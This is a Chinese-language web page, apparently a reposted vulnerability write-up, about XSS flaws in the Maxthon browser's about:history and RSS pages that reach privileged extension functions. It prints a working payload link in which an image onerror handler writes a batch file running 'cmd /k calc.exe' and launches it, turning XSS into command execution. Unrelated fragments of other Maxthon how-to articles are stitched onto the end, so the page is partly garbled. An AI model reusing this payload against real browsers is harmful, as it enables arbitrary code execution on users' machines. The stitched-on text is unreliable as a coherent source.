时间:2021-05-23
这个漏洞首先是国外某个团队发现的,他研究了多个浏览器的漏洞。其中遨游的漏洞比较独特,大致存在几个方面的,
1.about:history中存在xss漏洞,即浏览历史中url链接中存在明显的xss漏洞。
2.遨游的拓展中存在大量敏感函数,其中包括了写文件(目前看只能写在C:\Documents and Settings\Administrator\Local Settings\Temp目录下),命令执行(执行你写入的文件),此外目测还有大量系统内部数据可以操作,比如下载,配置等等。
3.除了1所说的地方外,Rss订阅那里也有xss漏洞,我个人估计遨游自己的插件大部分地方可能都会存在xss漏洞
4.2中所提到的大量敏感函数都是在dom中,只能在域i.maxthon.com以及本地类似浏览历史,收藏夹这种地方被调用。
构造类似链接
http:// /1.html#\"><img src=a onerror='var b=maxthon.io.File.createTempFile("test","bat");c=maxthon.io.File(b);maxthon.io.FileWriter(b);maxthon.io.writeText("cmd /k calc.exe");alert(b.name_);maxthon.program.Program.launch(b.name_,"C:\\WINDOWS\\system32")'/>
在遨游中访问,
然后打开about:history,就可以看到效果了
那个pdf给的例子是构造了1.html的内容为
a=window.location.href='about:history';
修复方案:
ms遨游已经修复了直接打开about:history这个洞
声明:本页内容来源网络,仅供用户参考;我单位不保证亦不表示资料全面及准确无误,也不保证亦不表示这些资料为最新信息,如因任何原因,本网内容或者用户因倚赖本网内容造成任何损失或损害,我单位将不会负任何法律责任。如涉及版权问题,请提交至online#300.cn邮箱联系删除。
傲游云浏览器是小编很喜欢的一款浏览器。在使用傲游浏览器的朋友可能会觉得傲游浏览器的皮肤可能太过单调希望换一款皮肤。下面小编就为大家介绍一下傲游浏览器的这么换皮肤
漏洞说明:傲游浏览器是一个强大的多页面浏览器.除了方便的浏览功能,傲游浏览器还提供了大量的实用功能改善用户的上网体验,其在中国浏览器市场拥有大量的用户,以安全,
傲游云浏览器是款简洁大方的浏览器,当你想将电脑上需要用傲游云浏览器打开的文件,用傲游浏览器打开,但是却不是傲游云浏览器的时候。你会不会很苦恼呢?现在不用苦恼啦,
傲游浏览器退出了全新的截图功能,创新性加入了气泡、模糊、荧光笔等工具,让网民能够分享更多。傲游浏览器截图功能的使用方法简单、好用。软件名称:傲游浏览器3Ma
傲游浏览器不仅在PC端上受到欢迎,手机版傲游浏览器也是积攒了不少的人气。在夜间使用傲游浏览器来看小说,为了眼睛的健康,我们还是要设置为夜间模式比较好?软件名